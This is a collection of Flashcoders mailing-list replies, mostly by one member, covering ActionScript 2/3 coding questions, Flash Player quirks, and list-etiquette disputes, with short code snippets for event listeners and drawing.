Re: [Flashcoders] Flash Game/Highscore security
Almin Sehic schrieb: What is the best way to protect the highscore? don't put it online. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Scrubbing offline flvPlayback with code
Danny Kodicek schrieb: We wrote one recently for a client. You can download it from here: http://www.view.uk.com/temp/video.player.zip Wow, thanks Jason, that's really helpful. I've been examining this and it's great, but it suffers the same problems that my version did: it doesn't scrub the video to an exact time, only to the nearest keyframe. Our videos are only a few seconds long and may have no more than one keyframe in the middle. Anyone got a solution that allows you to set a time precisely? that's the game with keyframes i think. you can only insert more keyframes while rendering them to flv's. if they are that short as you describe, it shouldn't really matter. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Text background
Mike Cobb schrieb: - Hi! I've got a tricky problem which I want to put to the list: Does anyone know any way to style a chunk of text with a background colour? I've got a dynamic multi-line textfield bringing in html text. Flash has no CSS support for background-color, so I would like to find a workaround for adding a background to portions of text. Flash 8, AS2 FP9 or better AS3 is your friend then.[1] or shall i say should be your friend :-) AS2 or more precisely the FP8 interpreting bytecode is way too slow (and textextend is waywayway too buggy)to give you precise coordinates. this would only work for a small mount of text (which is definately not enough for your task, i guess), and your text has to be monospaced (which in this case *is* what you want). you than would have to calc each characters position/coords based on a given width and height, well ... you see, ugly solution. micha [1] don't have a link @ hand, but it's in the docs. look for TextField or similar, you should find some more classes nearby, which can do that for you. ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [FlashCoders] Images stay on memory forever?
eric dolecki schrieb: to remove a movieclip, you need to create or attach it first. if you're using the IDE to place the mcs, you can't use removeMovieClip(). that is not totally true: you could always: var mc = _root.createEmptyMovieClip('___dummy', _root.getNextHighestDepth()); mc_onStage.swapDepths(mc); mc_onStage.removeMovieClip(); micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Re: new logger for as 2
John Grden schrieb: Hey Hans, if you need a mirror, let me know i can mirror that too, if needed. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] JOB: BLITZ Agency
Paul Venton schrieb: Maybe that's why they're after a new developer ;-) yeah, and tell him / her that there some of us want to use their loved mousewheel. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] [AMFPHP] return; - feature / bug ?
Jeroen Beckers schrieb: Hi, This is the situation: Flash uses AMFPHP to call a php function 'test1()' . In my php file, the function is defined as followed: function test1() { test2(); return Hello; } function test2() { return World; } Now, AMFPHP returns World (when I call test1() ), but I would expect him to return Hello (like flash would do). Is this a feature or a bug? (Or maybe just a hole in my PHP knowledge ?) seems like php returns mean to 'break' this. i'd suggest to put the retrurn of test2() into a local var. it just doesn't make sense anyway, even if it would return just 'Hello', right ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Welcome our newest member
Helmut Granda schrieb: Please make her feel at home... if only we knew her name ... micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] double click problem
Merrill, Jason schrieb: 1. Subscribe to Flashnewbies - this list isn't really for those kinds of questions. 2. Read up on LoadMovie in the help docs. if you think his doubleclick problems can be solved by reading sth about LoadMovie, maybe you both should switch to the lounge :-) @ rutul: maybe you can describe your problem better, when you put a fla online somewhere. give us that link, and hope that someone with some more time than me will look at your code. oh, btw: could you then please reduce the code to what gives you trouble ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] simple xml editor?
Merrill, Jason schrieb: This one is free and easy to use: Microsoft XML NotePad http://www.snapfiles.com/get/xmlnotepad.html Somewhat limited depending on the type of XML, but might fit your needs. It's pretty fool-proof. Microsoft made it, but doesn't support or distribute it any more. Jason Merrill Bank of America Learning Organization Effectiveness - Technology Solutions ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com i might be wrong, but this one looks exactly like peter's xml editor (v. 1.1)[1]. does somebody know if ms hired him ? [1] http://www.iol.ie/~pxe/download.html micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] zoomin'
Steven Sacks | BLITZ schrieb: I mean, do you think that anyone would give a crap about that site if it had standard navigation? even with a non-standard navigation, which i have alrady seen some years ago (natzke etc), it stays crap. but to stay OT: the question was for some ideas to get such an effect. as this doesn't really need a 3d environment, i'd suggest you dynamically attach your clips as they should appear in time. by simply setting a listener for the scrollwheel (look this up in the manual) you get your event(s) (the time). you then scale your clips according to the _depth they have. well it's just to get you started, so don't mindif i don't get too much into details, and i'm sure there a better concepts for this. just wanted to get back OT. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
[OT] was: [Flashcoders] flash 9 preview issue...
jordan robinson schrieb: I am having issues installing the flash 9 preview, anyone else have this error come up while trying to open flash 9 after install? http://www.mighty55.com/pics/flash9_error.jpg Any help would be great. *note I have a fully licensed studio 8 professional suite. i had the same issues. i guess we both installed the trial. and as my cd's came, i put in my serial. note: i can't remember where it was - on osflash list or here - but someone mentioned not to uninstall F9alpha - i had no issues with that, but there might be a chance, so you better contact someone from adobe. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Public list of open issues, available?
Weyert de Boer schrieb: Well, I was more looking for such page of reported/known issues in Flash 8 IDE. ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com i wonder how long this issues might be relevant: http://aralbalkan.com/664 micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] ActionScript Application Framework
Steven Sacks | BLITZ schrieb: At one time, Director developers were saying Flash was just hype. Macromedia just had great marketing but their product wasn't very good. Flash sucks. :P wtf is director ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Text Field Search
Jorge Antonio Diaz Gutierrez schrieb: Hi everyone. I'm trying to make a Search Engine that allows me to make a Search trough a few XMLs documents I load into a Text Field. Does anyone has any sample or an advice for me to do it ??? http://www.pippoflash.com/index.php/2006/07/10/downaload-flash-text-search-engine-class/ micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Php Host
Weyert de Boer schrieb: I am planning to take a server in germany. I have heard good things about this company: https://www.server4you.de/de/start.php?a And cheap too! Yours, Weyert ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com do not. not very reliable. but when it's there, they're fast. no service though. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Detecting a Sound Card
Ian Thomas schrieb: Hi folks, I have a situation where my app doesn't work on a PC with no sound card installed, because I depend on onSoundComplete for a couple of synchronised triggers and (guess what) onSoundComplete is never called if the machine doesn't have a sound card. Not unexpected, I guess. However, unfortunately System.capabilities.hasAudio doesn't report false. I assume it only returns false for builds of a player that doesn't have audio (for example, handhelds and so forth). you cant do that natively. but what is so bad about a simple button that plays a sound and asks the user if he heard it? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] AS3 faster ??
neo binedell schrieb: I posted about the 3D engine I wrote and the speed increase I got when I converted it to AS3 a few days ago so you can check that out as an example of just how much faster it is ;p check out where? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
[Flashcoders] problem downloading files via flash.net.FileReference from subdomain
i have setup a subdomain like mysubdomain.domain.tld. now i want to download Files via flash.net.FileReference which works fine on localhost but not on deploy server. the error is the path to the file. the server prepends a local path to the subdomain which is like: /hsphere/local/home/domain/subdomain/ which is correct, cause the subdomain is routed to a folder which is called like the subdomain. here's my as-code: CODE function downloadNext (item) { var file:FileReference = new FileReference (); file.addListener (downLoadListener); NetDebug.trace (Download parameter: + item); // traces fine, just the filename no path! file.download (item); } /CODE to listen to the events, i have an objectListener like: CODE downLoadListener = new Object (); // downLoadListener.onSelect = function (file:FileReference):Void { trace (onSelect: + file.name); NetDebug.trace (onSelect: + file.name); }; downLoadListener.onCancel = function (file:FileReference):Void { trace (onCancel); NetDebug.trace (onCancel); }; downLoadListener.onOpen = function (file:FileReference):Void { trace (onOpen: + file.name); NetDebug.trace (onOpen: + file.name); }; downLoadListener.onProgress = function (file:FileReference, bytesLoaded:Number, bytesTotal:Number):Void { trace (onProgress with bytesLoaded: + bytesLoaded + bytesTotal: + bytesTotal); NetDebug.trace (onProgress with bytesLoaded: + bytesLoaded + bytesTotal: + bytesTotal); }; downLoadListener.onComplete = function (file:FileReference):Void { trace (onComplete: + file.name); NetDebug.trace (onComplete: + file.name); NetDebug.trace (fileList.length: + fileList.length); if (fileList.length 1) { downloadNext (fileList[0]); } }; downLoadListener.onIOError = function (file:FileReference):Void { trace (onIOError: + file.name); NetDebug.trace (onIOError: + file.name); }; downLoadListener.onHTTPError = function(file:FileReference):Void { trace(onHTTPError: + file.name); NetDebug.trace (onHTTPError: + file.name); } downLoadListener.onSecurityError = function(file:FileReference, errorString:String):Void { trace(onSecurityError: + file.name + errorString: + errorString); NetDebug.trace (onSecurityError: + file.name + errorString: + errorString); } /CODE the funny thing is, that the onSelect gets called, when downloadNext is invoked but no onHTTPError or else. anyone to shed some light ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] AS3 Flash 9 - Speed Freak
Zárate schrieb: Hi, I was quite happy hearing about the performance until I went to play here: http://www.teagames.com/games/tgmotocross/play.php Please take a look to the performance playing with player 8 and playing with player 9. Then it's curious because the CPU usage remains under 50% at all times, even when the game is painfully slow. i just played motocross very nice game btw. ... and it was really ddead slow in FF (player 9) but in IE it has expected speed i guess. you should try it in both to see the diff. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [SPAM?] RE: [Flashcoders] XPcomponents set
Steven Sacks | BLITZ schrieb: I don't think it's a scam. I gave them a call when I was working with them and they were amazingly helpful and polite. I think it's 3 guys coding a component framework, and one that's not too shabby. Sure, it doesn't work with MM's framework, but who cares? V2 is garbage anyways. It's not just MM's components it doesn't work with, it's Flash in general. When you put ANY of their components in your movie, the following Flash native code no longer works. Selection.setFocus TextField.tabIndex that is indeed bad, as long as this framework doesn't handle this stuff instead. i don't know if it does. Like I mentioned before, they are amazingly helpful and polite. It doesn't change the fact that their components don't work standalone, that you must code how they tell you to code and use their framework to code all your Flash applications, that it's not made clear that this is a requirement for using their components MM did that as well, did you say scam then too ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] li color
Lee McColl-Sylvester schrieb: You can do this with CSS... You can even exchange the bullets for images. CSS is pure power if you know what you're doing. Check this out. www.jessett.com/web_sites/css/bullet_graphics.shtml or more on topic www.frontpagewebmaster.com/m-195255/tm.htm be sure to read the whole thread. Sometime you just have to tinker. Lee go back sleeping :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
[Flashcoders] webservice - https and flash
i don't know much about https:// but does anyone know a way to connect flash to this ? preffered a php way. much more preffered a native way ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] webservice - https and flash
Weyert de Boer schrieb: Michael Stuhr wrote: i don't know much about https:// but does anyone know a way to connect flash to this ? I think this hsould just work fine, because the browser does all the heavy lifting, downloading wise. ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com maybe, but the ide does not. any ideas how to circumvent that ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] webservice - https and flash
David Rorex schrieb: What problem are you having with connections over SSL? I've used it many times, (for loadvars, for loadmovie, etc), and never had to do anything extra, it just works. the flash part resits outside of https. You might have some trouble, if you load some files from http:// and some files from https://, there are a bunch of security restrictions built into the flash player. Easiest way is to just load everything from the same place (including the initial swf file). If you can't do that for whatever reason, read the help docs on what exactly the security restrictions are, and how to work with them. would crossdomain.xml help here ? i'm not sure. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] how to handle large menus
Sam schrieb: What is the best way to handle generating a large menu? What I'm doing currently is looping thru an array and creating a mc and adding a text feild to it, as you can imagine this craps out on larger arrays. I'm sure this is not the preferred way to do something like this and I'm looking for suggestions. Is there a way to just have 1 textfield with a list of clickable items? how large would that array be ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] question SO class
Scott Hyndman schrieb: Just out of interest, what benefit exactly does this class provide? You seem to offer the same methods that the shared object does with different names (although the names are clearer, I'll give you that). except for that setData() i would have expected saveCookie() or sth like that. @Caruso: you should try it this way: (just out of my head ...) function saveCookie (props:Object) { this._data = props; } so now all you have to provide to this function is an object like: var o:Object = new Object (...); saveCookie (o); never tried but you could also use: http://www.meychi.com/source/actionscript/classes/Cookie.as micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
[OT] was: [Flashcoders] Eolas fix and backspace key flash bug
while this silly thread is still alive: i just wanted to inform you about two mails i got directly from members and non members from this list. i am quoting the mails here cause i thought since i got them because i posted to this list, the list should get this part of the thread too: first one is from josh from theyrule.net, somewhat friendlier: ([EMAIL PROTECTED]) Hi Michael, I am not on Flashcoders, but I do check the archives and was following the Eolas workarounds. I would have replied to the whole list but don't want to sub and have to deal with the volume. Nevertheless, I feel compelled to write in response to your mail that I have copied below. I think that you should apologize for this posting - because if you look back at the post that you are responding to - you will find that 1) it is about flash code (yes as it relates to the environment it sits in) and 2) that you can not test this in Firefox - because the EOLAS patent isn't enforced there. The question is still open - I believe it is an IE bug - not passing full focus to Flash - if this is the case then Macromedia should know about it. - ok, josh is so frankly of being clever and better stay off this list, for it has too much traffic for him. we all should do this. would keep traffic way lower than nowadays, don't you think? I already answered him: Hi Michael, I am not on Flashcoders, ok, so why do you bother me (private) with that thread at all ? but I do check the archives and was following the Eolas workarounds. I would have replied to the whole list but don't want to sub and *have to deal with the volume*. no comment. Nevertheless, I feel compelled to write in response to your mail that I have copied below. I think that you should apologize for this posting - because if you look back at the post that you are responding to - you will find that 1) it is about flash code (yes as it relates to the environment it sits in) it has and will never have anything to do with actionscript or related jsfl @ all. it's a browser thing. period. The question is still open - I believe it is an IE bug - not passing full focus to Flash - if this is the case then *Macromedia *should know about it. yeah, and you still live in 2005 do you :-) ? Btw: you broke several rules of the netiquette in general (search the archives or google it.) now you're another item on my Junk list right now, since you don't care for the easiest rules of all. micha but wait there was another one ... here's what kid alec has to tell me: ([EMAIL PROTECTED]) Cannot test this in Mozilla, because Mozilla does not require flash activation. Think before you type in public forums, idiot. i'm not gonna feed this troll. make your own decisions. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Java's wait(timeout) and notify() in ActionScript
Scott Hyndman schrieb: Yeah, sure. Use setInterval. If the user interacts before the time expires, call clearInterval. jupp, and beware of the scope. this can be deadly with setInterval. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] is extending TextField usable with AS2?
Merrill, Jason schrieb: Peter O'Brien schrieb: title says it all really, I'd prefer not to use prototype, is there anyway I can make an instance of my AS2 extension of TextField? RTFM where it says all about classes. micha Come on now micha, play nice. It's not like the manual has a section in classes about extending TextFields - now you got me: no, it hasn't but creating subclasses is in there. You cannot extend the TextField class or static classes (from: http://livedocs.macromedia.com/flash/8/main/1359.html) took me 1 minute to find. search the archives is an option too: http://chattyfig.figleaf.com/mailman/htdig/flashcoders/2005-March/134251.html don't we have a nettiquette ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
[OT] was: [Flashcoders] is extending TextField usable with AS2?
Merrill, Jason schrieb: You cannot extend the TextField class or static classes (from: http://livedocs.macromedia.com/flash/8/main/1359.html) took me 1 minute to find. Micha, so then if you can't extend it, why wouldn't you just SAY that instead of telling him to read up on classes in TFM. because i would always have to look it up myself. he could have done that too, i don't read in his post that he's done that. he even is unclear about what he's trying to achieve. and why he's not taking the prototype road. just stating that he doesn't want to. The statement, RTFM where it says all about classes to most logical people would imply there is a way if you just take the time read the manual, not that if you take the time to read the manual, you'll discover you can't do it. yeah that might be the case. but it took me 1 minute to find what he was looking for, just by going to the archives, pasting his claim 'extending TextField' into the searchfield, look over the results, picking the 1st on the first result page that has 'extending TextField' in it's subject, clicking back to where it started, and find the piece i was looking for. and really this didn't take more than a minute. what is so difficult about that, that one cannot do this BEFORE asking us all? I think perhaps your RTFM attitude is/was uncalled for and unfair to the poster. This is the kind of attitude that has degraded the list, not that the gurus have gone on. You could say RTFM to just about anything you think YOU'RE a wiz at. no. but i do say that, when i did a quick search in the archives, just to be sure. and everybody posting to this list SHALL first search the archives. just click te link @ the end of any mail you get from flashcoders that says: or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders. it's that easy. Some people HAVE read the manual (which your link was actual to the Live Docs, not the built in help), or couldn't find it in the manual, and just want to ask for some legitimate help, which is what this list is for. but there are nonetheless rules for this list. one of them is: search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders If you think someone should just read the manual, then don't bother responding, just keep quiet rather than trying to cop an attitude and make them feel stupid for asking. not stupid for asking but maybe too lazy for not searching first. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] checkbox component label - can it wrap?
Woodage, Alison schrieb: Just a quickie... Does anyone know if you can set a checkbox component label to wrap if required. I think I already know the answer ('no') but thought I'd ask just in case someone knows otherwise. it will behave very strange if you directly turn the textfield used inside into multiline. but try it for yourself :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Eolas fix and backspace key flash bug
Aaron Buchanan schrieb: Fresh off the Flash coders content degrading thread, eh? didn't even read it. but i hate those vampires. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Eolas fix and backspace key flash bug
Aaron Buchanan schrieb: Now that I think about it, lot's of people will a similar issue with any myspace applets. Since JS is restricted. Would be interested in hearing the resolution. Did you try in firefox? a why not use UFO or similar and provide an additional noscript / with the somewhat deprecated object and embed ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Preloading classes
Nick Weekes schrieb: Hi all, I have a swf that uses several external classes (the built in tween classes and some of my own), and when I test the movie I notice that this code is compiled in frame 1 of my movie. So a preloader isn't going to be 100% accurate as it will load my classes first, then my preloader code. Is it possible to configure where classes get compiled, so maybe it isn't in frame 1? what is the problem of using an external preloader-swf ? that way you don't have to worry about such things. btw: this question comes so often i can't count, would you mind digging the archive next time you prepare to ask a question ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Re: BUG: setMask calls onLoadInit (or setting a mask?)
grimmwerks schrieb: Sigh. I'm an arse. It must be the two days of programming. hope you enjoyed it :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Flash detection
Kevin Boyd (MMCR) schrieb: Client wants to detect if flash installed and then jump to a HTML based site if not. What is the current state of play with this approach regards IE and Firefox? http://www.bobbyvandersluis.com/ufo/ http://www.adobe.com/devnet/flash/articles/swfobject.html micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
[Flashcoders] no rollovers when mousebutton is pressed
is this true ? while holding down the mouse, there's no rollover anymore, even the dragOver doesn't respond ? here's my test: CODE function drawRect (c:MovieClip) { c.lineStyle (0, 0x0, 0); c.beginFill (0xF1, 100); c.lineTo (30, 0); c.lineTo (30, 30); c.lineTo (0, 30); c.lineTo (0, 0); c.endFill (); } for (var i = 0; i 10; i++) { var c = this.createEmptyMovieClip ('foo_' + i, i); c._alpha = 20; c._x = i*30; drawRect(c); c.onRollOver = function () { trace (this) // traces only when c has already been 'pressed' this._alpha = 100 } c.onRollOut = function () { this._alpha = 20 } c.onPress = function () { trace(this) } c.onRelease = function () { trace(this) } c.onDragOver = function () { trace (this) // traces only when c has already been 'pressed' this._alpha = 100 } } /CODE any workarounds here ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] no rollovers when mousebutton is pressed
eric dolecki schrieb: mouseMove hitTest I guess yupp, but that's ugly as hell! You see i wanted to mimic a range selection like gCal (google calendar it is i believe) has one. i can do that with hitTest ‚fairly‘ simple, but heh - just some extra hits for the CPU i guess. thanks for clarification eric. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] no rollovers when mousebutton is pressed
Ian Thomas schrieb: is onDragOut() useful to you? „you can keep it foryourself, if you have any needs for that one my dear“ :-) well, actually no. sorry. See if dragOver doesn't respond, why should dragOut ? Wouldn't make much sense to me. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] no rollovers when mousebutton is pressed
Roman Hippler schrieb: try c.trackAsMenu = true; ::grumbles like gimley:: hmpff! but that still counts as one! micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] no rollovers when mousebutton is pressed
eric dolecki schrieb: Why not do something like this (if you're doing google calendar thing): mouseDown, you start to record mouse position, using drawAPI or actually highlight your time blocks), then onMouseUp you check to see what the range was, etc. etc. Roman already hit the nail! no need for defacing our experience anymore :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
[Flashcoders] calendar application
does anyone know some OS calendar application (done in flash), like google calendar ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Are you a help vampire?
